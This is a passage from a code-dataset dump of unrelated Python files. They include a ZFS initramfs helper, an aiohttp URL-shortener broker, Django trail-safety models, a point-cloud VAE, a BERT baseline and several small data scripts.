dict(attractor[synset])\n\t\t\"\"\"\n\t\tfor code, descriptor_dict in self.table_c_with_attractor.iteritems():\n\t\t\tfor descriptor, attractor in descriptor_dict.iteritems():\n\t\t\t\tnew_synset = attractor_synset[attractor.lower()]\n\t\t\t\tnew_synset.insert(0, attractor)\n\t\t\t\tnew_description_dict = dict()\n\t\t\t\tnew_description_dict[descriptor] = new_synset\n\t\t\t\tself.enriched_table_c[code] = new_description_dict\n","sub_path":"enricher_module/enriching_table_c.py","file_name":"enriching_table_c.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"592556974","text":"\n\n#calss header\nclass _HIRE():\n\tdef __init__(self,): \n\t\tself.name = \"HIRE\"\n\t\tself.definitions = [u'an arrangement to use something by paying for it: ', u'a person to whom a company has recently given a job: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_hire.py","file_name":"_hire.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"574463776","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\nimport sys\n\nimport libzfs\nimport pyudev\n\n\nif __name__ == \"__main__\":\n boot_pool, root, update_initramfs_if_changes = sys.argv[1:]\n\n with libzfs.ZFS() as zfs:\n disks = [disk.replace(\"/dev/\", \"\") for disk in zfs.get(boot_pool).disks]\n\n mapping = {}\n for dev in filter(\n lambda d: not d.sys_name.startswith(\"sr\") and d.get(\"DEVTYPE\") in (\"disk\", \"partition\"),\n pyudev.Context().list_devices(subsystem=\"block\")\n ):\n if dev.get(\"DEVTYPE\") == \"disk\":\n mapping[dev.sys_name] = dev.get(\"ID_BUS\")\n elif dev.get(\"ID_PART_ENTRY_UUID\"):\n parent = dev.find_parent(\"block\")\n mapping[dev.sys_name] = parent.get(\"ID_BUS\")\n mapping[os.path.join(\"disk/by-partuuid\", dev.get(\"ID_PART_ENTRY_UUID\"))] = parent.get(\"ID_BUS\")\n\n has_usb = False\n for dev in disks:\n if mapping.get(dev) == \"usb\":\n has_usb = True\n break\n\n zfs_config_path = os.path.join(root, \"etc/default/zfs\")\n with open(zfs_config_path) as f:\n original_config = f.read()\n lines = original_config.rstrip().split(\"\\n\")\n\n zfs_var_name = \"ZFS_INITRD_POST_MODPROBE_SLEEP\"\n lines = [line for line in lines if not line.startswith(f\"{zfs_var_name}=\")]\n if has_usb:\n lines.append(f\"{zfs_var_name}=15\")\n\n new_config = \"\\n\".join(lines) + \"\\n\"\n\n if new_config != original_config:\n with open(zfs_config_path, \"w\") as f:\n f.write(new_config)\n\n if update_initramfs_if_changes == \"1\":\n subprocess.run([\"chroot\", root, \"update-initramfs\", \"-k\", \"all\", \"-u\"], check=True)\n","sub_path":"src/freenas/usr/local/bin/initrd-zfs.py","file_name":"initrd-zfs.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244297588","text":"import csv\nfrom time import sleep\nfrom os import path\n\npossible = [\n [year, month, day]\n for year in range(2013, 2020)\n for month in range(1, 13)\n for day in range(1, 32)\n]\n\noverall = [\n [\n \"slug\",\n \"name\",\n \"team\",\n \"location\",\n \"opponent\",\n \"outcome\",\n \"seconds_played\",\n \"made_field_goals\",\n \"attempted_field_goals\",\n \"made_three_point_field_goals\",\n \"attempted_three_point_field_goals\",\n \"made_free_throws\",\n \"attempted_free_throws\",\n \"offensive_rebounds\",\n \"defensive_rebounds\",\n \"assists\",\n \"steals\",\n \"blocks\",\n \"turnovers\",\n \"personal_fouls\",\n \"game_score\",\n \"year\",\n \"month\",\n \"day\",\n ]\n]\n\nfor date in possible:\n year, month, day = date\n\n p1 = \"./individual/\"\n p2 = \"-\".join([str(year), str(month), str(day)])\n p3 = \"-score.csv\"\n\n file = p1 + p2 + p3\n\n if path.exists(file):\n with open(file, \"r\") as f:\n page = [row for row in csv.reader(f)]\n if len(page) > 1:\n for row in page[1:]:\n p = row\n # print(date[0], date[1], date[2], \"~player:\", p[1])\n for i in date:\n p.append(i)\n # p.append(date[0])\n # p.append(date[1])\n # p.append(date[2])\n overall.append(p)\n print(\"Done with this file --\", file)\n sleep(1)\n else:\n print(\"NOTE: This file only had 1 row --\", file)\n pass\n\n else:\n print(\"WARNING: This file does not exist --\", file)\n pass\n\nwith open(\"box-scores.csv\", \"w\") as file:\n csvWriter = csv.writer(file, delimiter=\",\")\n csvWriter.writerows(overall)\n","sub_path":"combine-box-scores.py","file_name":"combine-box-scores.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"576656843","text":"import json\nimport asyncio\n\nfrom aiohttp import web\nimport zmq\nimport aiozmq\n\nfrom svc.broker.task_dispatcher import TaskDispatcher, DispatchNoFreeWorkerError, \\\n DispatchTimeoutError, DispatchBadRequestError\n\n\nclass Handler():\n task_dispatcher = None\n\n def __init__(self, task_dispatcher):\n self.task_dispatcher = task_dispatcher\n\n @asyncio.coroutine\n def shorten(self, request):\n post_data = yield from request.json()\n data = {\"post_data\": post_data}\n\n try:\n result = yield from self.task_dispatcher.process('shorten', json.dumps(data))\n except (DispatchNoFreeWorkerError, asyncio.CancelledError):\n return web.web_exceptions.HTTPInternalServerError()\n except DispatchTimeoutError:\n return web.web_exceptions.HTTPRequestTimeout()\n except DispatchBadRequestError:\n return web.web_exceptions.HTTPBadRequest()\n\n return web.Response(\n body=json.dumps(result).encode('utf-8'),\n content_type='application/json')\n\n @asyncio.coroutine\n def expand(self, request):\n\n params = {\n 'ua_string': request.headers[\"USER-AGENT\"],\n 'short_url': request.match_info['hash']\n }\n\n try:\n result = yield from self.task_dispatcher.process('expand', json.dumps(params))\n\n except (DispatchNoFreeWorkerError, asyncio.CancelledError):\n return web.web_exceptions.HTTPInternalServerError()\n except DispatchTimeoutError:\n return web.web_exceptions.HTTPRequestTimeout()\n except DispatchBadRequestError:\n return web.web_exceptions.HTTPBadRequest()\n if result:\n return web.Response(\n body=json.dumps(result).encode('utf-8'),\n content_type='application/json')\n else:\n return web.web_exceptions.HTTPNotFound() # 404\n\n\n@asyncio.coroutine\ndef start_task_dispatcher(loop=None):\n if not loop:\n loop = asyncio.get_event_loop()\n\n dispatcher_closed = asyncio.Future()\n _, task_dispatcher = yield from aiozmq.create_zmq_connection(\n lambda: TaskDispatcher(dispatcher_closed, loop),\n zmq.ROUTER,\n bind='tcp://{}:{}'.format('0.0.0.0', 7777),\n loop=loop\n )\n # logger.info(\"Starting mixer zmq connection at {host}:{port}\".format(\n # host='0.0.0.0', port=7777))\n return task_dispatcher, dispatcher_closed\n\n\nif __name__ == '__main__':\n\n app = web.Application()\n loop = asyncio.get_event_loop()\n task_dispatcher, dispatcher_closed = loop.run_until_complete(\n start_task_dispatcher(loop=loop)\n )\n\n handler = Handler(task_dispatcher)\n\n app = web.Application()\n \"\"\"\n curl -H \"Content-Type: application/json\" -X POST -d '{\"domain\":\"pm.me\",\"urls\":{\"apple\":\"https://itunes.apple.com/us/app/valutcik/id978512096?mt=8\",\"android\":\"https://play.google.com/store/apps/details?id=me.valutchik.app\"},\"appId\":\"app-id-123\",\"userId\":\"1234567\"}' localhost:8080/shorten\n \"\"\"\n app.router.add_route('POST', r'/shorten', handler.shorten)\n app.router.add_route('GET', r'/expand/{hash}', handler.expand)\n\n # loop = asyncio.get_event_loop()\n f = loop.create_server(\n app.make_handler(), '0.0.0.0', 8011)\n srv = loop.run_until_complete(f)\n print('serving on', srv.sockets[0].getsockname())\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n","sub_path":"mixer.py","file_name":"mixer.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"601796397","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport subprocess\n\nthisdir = os.path.dirname(os.path.realpath(__file__))\nbasedir = os.path.dirname(thisdir)\nsys.path.append(basedir)\nimport config\n\npoint = ' '.join(sys.argv[1:])\n\noutdir = config.histDir + '/simplified_xsec'\n\nif point == 'combine':\n\n values = {}\n\n for fname in os.listdir(outdir):\n with open(outdir + '/' + fname) as source:\n for line in source:\n line = line.strip()\n if 'final cross section' in line:\n values[fname.replace('.dat', '')] = line[line.find('=') + 2:]\n break\n\n with open(outdir + '/xsec.txt', 'w') as output:\n for point in sorted(values.keys()):\n output.write(point + ' ' + values[point] + '\\n')\n\nelse:\n outname = outdir + '/' + point.replace('[', '').replace(']', '').replace(' ', '_') + '.dat'\n if os.path.exists(outname):\n sys.exit(0)\n\n files = None\n with open('simplified_fastsim.txt') as flist:\n for line in flist:\n line = line.strip()\n if line.startswith(point):\n files = []\n continue\n \n if files is None:\n continue\n \n if not line:\n break\n \n files.append(line)\n \n inputFiles = ' '.join(['inputFiles=%s' % f for f in files])\n \n output = open(outname, 'w')\n \n proc = subprocess.Popen('source /cvmfs/cms.cern.ch/cmsset_default.sh;export X509_USER_PROXY=/home/' + os.environ['USER'] + '/x509up_u' + str(os.getuid()) + '; cd ' + os.environ['CMSSW_BASE'] + ';eval `scram runtime -sh`;cmsRun genxsec.py ' + inputFiles, shell = True, stdout = output, stderr = subprocess.STDOUT)\n \n proc.communicate()\n \n output.close()\n","sub_path":"monophoton/misc/simplified_xsec.py","file_name":"simplified_xsec.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511722963","text":"# coding=utf-8 \n \nfrom __future__ import unicode_literals \n \nimport datetime \n \nfrom django.core.validators import MinValueValidator \nfrom django.db import models \nfrom django.utils import timezone \n \nfrom django.utils.translation import ugettext_lazy as _ \n \nKOLORY_SZLAKOW = (('zo', _(u'żółty')), ('n', _('niebieski')), ('z', _('zielony')), ('cza', _('czarny')), ('cze', _('czerwony'))) \n \n \nclass Wiatr(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n predkosc_minimalna = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Prędkość minimalna')) \n predkosc_maksymalna = models.IntegerField(validators=[MinValueValidator(0)], verbose_name=_(u'Prędkość maksymalna')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień wiatru') \n verbose_name_plural=_(u'Stopnie wiatru') \n \n \nclass Mgla(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n opis = models.TextField(verbose_name=_(u'Opis')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień mgły') \n verbose_name_plural = _(u'Stopnie mgły') \n \n \nclass Temperatura(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n powyzej = models.IntegerField(verbose_name=_(u'Powyżej')) \n ponizej = models.IntegerField(verbose_name=_(u'Poniżej')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień temperatury') \n verbose_name_plural = _(u'Stopnie temperatury') \n \n \nclass Deszcz(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n deszcz_minimalny = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Deszcz minimanly')) \n deszcz_maksymalny = models.IntegerField(validators=[MinValueValidator(0)], verbose_name=_(u'Deszcz maksymalny')) \n wiatr = models.ForeignKey(Wiatr, verbose_name=_(u'Wiatr')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień deszczu') \n verbose_name_plural =_(u'Stopnie deszczu') \n \n \nclass Lawina(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n opis = models.TextField(verbose_name=_(u'Opis')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień lawiny') \n verbose_name_plural = _(u'Stopnie lawiny') \n \n \nDZIALANIA = ( \n ('sm', _('System monitoruje')), \n ('mt', _(u'Monitorowanie turystów na zagrożonych obszarach')), \n ('wd', _(u'Wysłanie drona w celu lepszego monitorowania szlaku')), \n ('wder', _(u'Wysłanie drona do zbadania sytuacji i podjęcia decyzji o wysłaniu ekipy ratowniczej')),\r\n ('pt', _(u'Przechwycenie turystów')) \n ) \n \nclass StanAlarmowy(models.Model): \n poziom = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Poziom')) \n dzialanie = models.CharField(max_length=255, blank=False, choices=DZIALANIA, default='sm', verbose_name=_(u'Działanie')) \n \n def __unicode__(self): \n return str(self.poziom) \n \n class Meta: \n verbose_name=_(u'Stan alarmowy') \n verbose_name_plural = _(u'Stany alarmowe') \n \n \nclass Szlak(models.Model): \n stan_alarmowy = models.ForeignKey(StanAlarmowy, verbose_name=_(u'Stan alarmowy')) \n KML = models.TextField(blank=False) \n trudnosc = models.IntegerField(validators=[MinValueValidator(1)], verbose_name=_(u'Trudność')) \n kolor = models.CharField(max_length=255, choices=KOLORY_SZLAKOW, verbose_name=_(u'Kolor')) \n nazwa = models.CharField(max_length=255, verbose_name=_(u'Nazwa')) \n \n def __unicode__(self): \n return self.nazwa \n \n class Meta: \n verbose_name=_(u'Szlak') \n verbose_name_plural = _(u'Szlaki') \n \n \nclass Pogoda(models.Model): \n wiatr = models.ForeignKey(Wiatr, verbose_name=_(u'Stopień wiatru')) \n mgla = models.ForeignKey(Mgla, verbose_name=_(u'Stopień mgły')) \n temperatura = models.ForeignKey(Temperatura, verbose_name=_(u'Stopień temperatury')) \n deszcz = models.ForeignKey(Deszcz, verbose_name=_(u'Stopień deszczu')) \n lawina = models.ForeignKey(Lawina, verbose_name=_(u'Stopień lawiny')) \n czas = models.DateTimeField(blank=False, verbose_name=_(u'Czas')) \n szlak = models.ForeignKey(Szlak, null=True, verbose_name=_(u'Szlak')) \n \n def __unicode__(self): \n return str(self.czas) \n \n def zwroc_stan_alarmowy(self): \n stopnie_pogoda = self.wiatr.stopien + self.mgla.stopien + self.temperatura.stopien + self.deszcz.stopien + self.lawina.stopien \n skala = round((stopnie_pogoda + self.szlak.trudnosc) / 4.0) \n return StanAlarmowy.objects.order_by('poziom').filter(poziom__gte=skala).first() \n \n def save(self, *args, **kwargs): \n if self.czas > timezone.now() - datetime.timedelta(minutes=5): \n self.szlak.stan_alarmowy = self.zwroc_stan_alarmowy() \n self.szlak.save() \n super(Pogoda, self).save(*args, **kwargs) \n \n class Meta: \n verbose_name=_(u'Pogoda') \n verbose_name_plural = _(u'Pogody') \n \n \nclass StrefaZagrozenia(models.Model): \n pozycja_N = models.FloatField(verbose_name=_(u'Pozycja N')) \n pozycja_E = models.FloatField(verbose_name=_(u'Pozycja E')) \n promien = models.IntegerField(help_text = 'jednostka [m]', verbose_name=_(u'Promień')) \n nazwa = models.CharField(max_length=255, verbose_name=_(u'Nazwa')) \n\t \n def __unicode__(self):\n return self.nazwa\r\n \r\n class Meta:\r\n verbose_name=_(u'Strefa zagrożenia')\r\n verbose_name_plural=_(u'Strefy zagrożenia')","sub_path":"system_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"594926517","text":"import transformers\nfrom transformers import BertGenerationTokenizer, BertGenerationConfig, BertGenerationDecoder\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\nconfiguration = BertGenerationConfig(is_decoder=True)\n\nmodel = BertGenerationDecoder.from_pretrained('google/bert_for_seq_generation_L-24_bbc_encoder', is_decoder=True)\ntokenizer = BertGenerationTokenizer.from_pretrained('google/bert_for_seq_generation_L-24_bbc_encoder')\nrandom_size = (1, 512)\n\n\ndef getRandomTensor():\n multiplier = np.random.randint(low=1, high=28996)\n random_vec = multiplier*torch.rand(random_size)\n random_vec = random_vec.long()\n return random_vec\n\n\ndef readFile(filename):\n file = open(filename)\n file_contents = file.read()\n contents_split = file_contents.splitlines()\n return contents_split\n\n\nv = readFile('bert-base-cased-vocab.txt')\n\nif __name__ == '__main__':\n sent = []\n for i in range(10):\n print(i)\n random_vector = getRandomTensor()\n output = model(random_vector)\n print(output.shape)\n softmax = nn.Softmax(dim=1)\n prob = softmax(output.logits.squeeze())\n idx = torch.argmax(torch.argmax(prob, dim=0)).item()\n if idx > 28996:\n idx = np.random.randint(low=1, high=30522)\n sent.append(v[idx])\n print(\" \".join(sent))\n","sub_path":"BERT_GAN/BERT_baseline.py","file_name":"BERT_baseline.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638958216","text":"from builtins import int\n\nimport logging\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\n\nimport torch.nn.functional as F\n\nfrom src.chamfer_distance.chamfer_distance import chamfer_distance_with_batch\n# from src.dataset.data_utils import plot_pc\nfrom src.dataset.shapenet import ShapeDiffDataset\nfrom src.pytorch.region_select import FilterLocalization\nfrom src.pytorch.pointnet import PointNetDenseCls, PointNetCls\nfrom src.pytorch.range_bounds import RegularizedClip\n\n\nclass Encoder(nn.Module):\n def __init__(self, num_cubes):\n super(Encoder, self).__init__()\n self.num_cubes = num_cubes\n\n # input: torch.Size([bs, 3, num_points])\n self.dens = PointNetDenseCls(k=3) # torch.Size([bs, 3, num_points])\n\n # input: torch.Size([bs, 3, num_points])\n self.cls_prob = PointNetCls(k=num_cubes) # torch.Size([bs, k])\n self.fc_mu = PointNetCls(k=3 * num_cubes) # torch.Size([bs, 3k])\n self.fc_mat = PointNetCls(k=3 * num_cubes) # torch.Size([bs, 3k])\n\n def forward(self, x):\n \"\"\"\n :param x: input tensor: torch.Size([bs, 3, num_points])\n :return: probs in torch.Size([bs, num_cubes]), mu in torch.Size([bs, 3*num_cubes]),\n sigma in torch.Size([bs, 9*num_cubes])\n \"\"\"\n h1 = self.dens(x)\n\n return F.softmax(self.cls_prob(h1), dim=1), self.fc_mu(h1), self.fc_mat(h1)\n\n\nclass VAELoss(nn.Module):\n def __init__(self, cd_coeff=5.):\n \"\"\"\n\n :param coeff: list in length 3\n \"\"\"\n super(VAELoss, self).__init__()\n\n self.cd_coeff = cd_coeff\n\n self.loss = None\n\n def forward(self, x_diff_pred, x_diff_target):\n \"\"\"\n gives the batch normalized Variational Error.\n\n :param x_diff_pred: predicted completion: in shape (bs, num_points (N), 3)\n :param x_diff_target: ground trough completion: in shape (bs, num_points (M), 3)\n :return: scalar\n \"\"\"\n\n # points and points_reconstructed are n_points x 3 matrices\n if x_diff_pred.shape[1] == 0:\n logging.info(\"Found partial with no positive probability cubes: \" + str(x_diff_pred.shape))\n CD = 100\n else:\n CD = chamfer_distance_with_batch(x_diff_pred, x_diff_target, False)\n\n self.loss = self.cd_coeff * CD\n\n\nclass VariationalAutoEncoder(nn.Module):\n\n def __init__(self, num_cubes, dev, num_sample_cube=20):\n \"\"\"\n\n :param num_cubes: cube resolution float\n :param threshold: minimum probability to consider as part of the cover of the diff region\n :param num_sample_cube: how many samples to sample per cube\n \"\"\"\n super(VariationalAutoEncoder, self).__init__()\n\n self.num_cubes = num_cubes\n self.n_bins = int(round(num_cubes ** (1. / 3.)))\n\n self.num_sample_cube = num_sample_cube\n self.dev = dev\n\n self.mu = None\n self.sigma = None\n self.probs = None\n\n e0 = torch.arange(-1, 1, 2 / self.n_bins).detach()\n e1 = e0 + 2 / self.n_bins\n\n xv0, yv0, zv0 = torch.meshgrid(e0, e0, e0) # each is (20,20,20)\n self.lower_bound = torch.stack((xv0, yv0, zv0), dim=3).double().to(dev)\n\n xv1, yv1, zv1 = torch.meshgrid(e1, e1, e1) # each is (20,20,20)\n self.upper_bound = torch.stack((xv1, yv1, zv1), dim=3).double().to(dev)\n\n self.encoder = Encoder(num_cubes=num_cubes)\n self.rc = RegularizedClip(lower=self.lower_bound, upper=self.upper_bound, coeff=0.5, method=\"square\")\n self.fl = FilterLocalization()\n self.vloss = VAELoss()\n\n def _reparameterize(self):\n \"\"\"\n This reparameterization trick first generates a uniform distribution sample over the unit sphere,\n then shapes the distribution with the mu and sigma from the encoder.\n This way, we can can calculate the gradient parameterized by this particular random instance.\n\n :param mask: boolean tensor in torch.Size([bs, num_cubes])\n :param mu: Float tensor in torch.Size([bs, 3*num_cubes])\n :param sigma: Float tensor in torch.Size([bs, 3*num_cubes])\n :return: Float tensor in torch.Size([bs, num_samples, 3])\n \"\"\"\n\n vector_size = (self.mu.shape[0], self.num_cubes, self.num_sample_cube, 3)\n\n # sample random standard\n eps = torch.randn(vector_size).to(self.dev)\n eps *= self.sigma.view(self.sigma.shape[0], -1, 1, 3)\n eps += self.mu.view(self.mu.shape[0], -1, 1, 3)\n\n return eps\n\n def forward(self, x, x_target, prob_target):\n \"\"\"\n\n :param prob_target: frequency in ground trout cubes\n :param x_target: missing regions ground trout point cloud\n :param x: partial object point cloud\n :return:\n \"\"\"\n\n self.probs, self.mu, self.sigma = self.encoder(x) # mu, sigma, probs in torch.DoubleTensor\n\n ## clipping mu and calculating regulerize loss factor\n self.mu = self.rc(self.mu.view(self.n_bins, self.n_bins, self.n_bins, 3))\n\n z = self._reparameterize()\n\n out = self.fl(self.probs, prob_target, z)\n\n self.vloss(out, x_target)\n\n return out\n\n\nif __name__ == '__main__':\n bs = 1\n num_points = 250\n resulotion = 20 ** 3\n\n train_path = 'C:/Users/sharon/Documents/Research/data/dataset2019/shapenet/chair/'\n # train_path = '/home/coopers/data/chair/'\n obj_id = '03001627'\n\n shapenet = ShapeDiffDataset(train_path, obj_id)\n\n train_loader = torch.utils.data.DataLoader(shapenet, 1, shuffle=True)\n\n x_partial, hist, edges, x_diff = next(iter(train_loader))\n\n # in_data = Variable(torch.rand(bs, 3, num_points))\n # gt_diff = Variable(torch.rand(bs, num_points, 3))\n # gt_prob = Variable(torch.rand(bs, resulotion))\n\n ###########################################\n #\n # encoder = Encoder(num_cubes=resulotion)\n # probs, mu, scale = encoder(in_data)\n #\n # print('probs: ', probs.size()) # prob torch.Size([bs, 1000]) view(prob.shape[0], -1, 3)\n # print('mu: ', mu.size()) # mu torch.Size([bs, 3000])\n # print('scale: ', scale.size()) # scale torch.Size([bs, 9000])\n\n ###########################################\n\n vae = VariationalAutoEncoder(num_cubes=resulotion, dev='cpu').double()\n\n vae_out = vae(x_partial.transpose(2, 1), x_diff, hist.flatten())\n\n print(\"full_out \", vae_out.shape) # torch.Size([1, num_samples, 3])\n\n ###########################################\n\n #### plot centers ####\n # plot_pc([mu_out[0].reshape(-1, 3).detach().numpy()], colors=(\"black\"))\n #\n # z = vae._reparameterize()\n # print(\"params \", z.shape) # torch.Size([1, 1000, 100, 3])\n","sub_path":"src/pytorch/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"653240087","text":"import unittest\nfrom lxml.tests.common_imports import make_doctest\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTests([make_doctest('test_xhtml.txt')])\n return suite\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"desktop/core/ext-py/lxml-4.9.1/src/lxml/html/tests/test_xhtml.py","file_name":"test_xhtml.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"572704899","text":"from typing import List\nfrom src.analysis.interests.ProfAnalyzer import ProfAnalyzer\nfrom src.models.user.AUser import AUser\n\n\ndef _intersection(lst1, lst2):\n return list(set(lst1) & set(lst2))\n\n\ndef _normalize(num_arr):\n if not num_arr: return num_arr\n maxim = max(num_arr)\n return [w / maxim if maxim else w for w in num_arr]\n\n\ndef _needs_met(user_prof_type, at_prof_type):\n return user_prof_type ^ at_prof_type\n\n\ndef _get_common_friends(at_friends, user_friends):\n u_friends_ids = [friend.get('uid') for friend in user_friends]\n a_friends_ids = [friend.get('uid') for friend in at_friends]\n common_friends = [friend for friend in user_friends\n if friend.get('uid') in set(u_friends_ids).intersection(set(a_friends_ids))]\n return common_friends\n\n\ndef normalize(friends):\n if len(friends) == 0: return\n weights = [s.how_interested for s in friends]\n maxim = max(weights)\n if maxim:\n weights = [w / maxim for w in weights]\n for i, friend in enumerate(friends):\n friend.how_interested = weights[i]\n\n\nclass EventAnalyzer:\n \n def set_meetings(self,\n user, attenders,\n user_prof_cats, attenders_prof_cats,\n user_prof_type, ats_prof_types,\n user_interests, ats_interests):\n people_to_meet = []\n\n ui = set([pc for pc in user_interests])\n upc = set([pc[0] for pc in user_prof_cats])\n \n for i, attender in enumerate(attenders):\n how_common = 0\n # Common skills\n common_prof_cats = list(upc.intersection(set([pc[0] for pc in attenders_prof_cats[i]])))\n how_common += len(common_prof_cats) * 2\n needs_met = _needs_met(user_prof_type, ats_prof_types[i])\n how_common += 2 * needs_met\n # Common interests\n common_interests = list(ui.intersection(set([pc for pc in ats_interests[i]])))\n how_common += len(common_interests)\n \n people_to_meet.append({\n 'interest_score': how_common,\n 'needs_met': needs_met,\n 'reasons': {\n 'common_prof_cats': list(common_prof_cats),\n 'interests': common_interests\n }\n })\n iscore = _normalize([p['interest_score'] for p in people_to_meet])\n for i, p in enumerate(people_to_meet):\n p['interest_score'] = iscore[i]\n return people_to_meet\n\n def choose_people_for_event(self, friends: List[AUser], event_tags: List[str], prof_analyzer: ProfAnalyzer,\n social_network):\n event_cats = prof_analyzer.get_prof_cats(event_tags)\n ecn = [c[0] for c in event_cats]\n for friend in friends:\n _, user_cats = prof_analyzer.get_prof_keywords(social_network, friend, batch=True)\n ucn = [c[0] for c in user_cats]\n common = _intersection(ecn, ucn)\n how_interested = 0\n for c in common:\n how_interested += event_cats[ecn.index(c)][1]\n friend.how_interested = how_interested\n friends = sorted(friends, key=lambda x: x.how_interested, reverse=True)\n weights = _normalize([s.how_interested for s in friends])\n for i, f in enumerate(friends):\n f.how_interested = weights[i]\n return friends\n\n ","sub_path":"src/analysis/events/EventAnalyzer.py","file_name":"EventAnalyzer.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"170141265","text":"#!/usr/bin/env python3\nimport pprint\nimport os\nfrom PIL import Image\n\n\nclass Thumb:\n @staticmethod\n def exist(file_origin, dist_path, stock):\n \"\"\"\n Проверит существование тумьбочки, если есть то вернет false\n :param dist_path:\n :param file_origin:\n :param stock:\n :return: bool\n \"\"\"\n file_name = str(os.path.split(file_origin)[-1]).split(\".\")[0]\n\n postfix = Thumb.get_postfix(file_origin, stock)\n if str(file_origin).endswith(postfix) is True:\n return True\n\n file_name = \"\".join((file_name, Thumb.get_postfix(file_origin, stock)))\n return os.path.isfile(os.path.join(dist_path, file_name))\n\n @staticmethod\n def create(file_origin, dist_path, stock):\n \"\"\"\n Create thumbal image\n :param file_origin: файл оригинал\n :param dist_path: директория сохранения\n \"\"\"\n\n if Thumb.exist(file_origin, dist_path, stock) is True:\n return True\n\n img = Image.open(file_origin)\n img_org_width = img.size[0]\n img_org_height = img.size[1]\n if img_org_width > img_org_height:\n wpercent = (stock.width / float(img_org_width))\n hsize = int((float(img_org_height) * float(wpercent)))\n img = img.resize((stock.width, hsize), Image.ANTIALIAS)\n img_thumb = Image.new('RGBA', (stock.width, stock.height), 'white')\n offset = (0, int((stock.height - img.size[1]) / 2))\n else:\n wpercent = (stock.height / float(img_org_height))\n hsize = int((float(img_org_width) * float(wpercent)))\n img = img.resize((hsize, stock.height), Image.ANTIALIAS)\n img_thumb = Image.new('RGBA', (stock.width, stock.height), 'white')\n offset = (int((stock.width - img.size[0]) / 2), 0)\n img_thumb.paste(img, offset)\n # extension = os.path.splitext(file_origin)[-1].lower()\n file_name = str(os.path.split(file_origin)[-1]).split(\".\")[0]\n postfix = Thumb.get_postfix(file_origin, stock)\n\n file_name = \"\".join((file_name, postfix))\n\n img_thumb.save(os.path.join(dist_path, file_name))\n\n @staticmethod\n def get_postfix(file_origin, stock):\n \"\"\"\n Вернет постфикс создаваемой тумбочки.\n :param stock:\n :param file_origin:\n :return:\n \"\"\"\n extension = os.path.splitext(file_origin)[-1].lower()\n\n postfix = str(\"\").join((\"_\", str(stock.width), \"x\", str(stock.height), \"_\", stock.postfix, extension))\n\n return postfix\n","sub_path":"source/image_thumb.py","file_name":"image_thumb.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"650870729","text":"# encoding = utf-8\r\nfrom jqdatasdk import *\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import DataFrame\r\n\r\n\r\ndef get_eps():\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n\r\n industry_index = list(get_industries(name='sw_l1').index)\r\n # 所有行业的股票汇总\r\n stock_reg = []\r\n for industry in industry_index:\r\n stock = get_industry_stocks(industry_code=industry)\r\n for i in stock:\r\n stock_reg.append(i)\r\n # 获取财务数据(提取财务数据会自动删除取值为空的股票,因此每个季度返回的财务数据量不一样,使用pd.concat合并)\r\n q = query(indicator.code, indicator.pubDate, 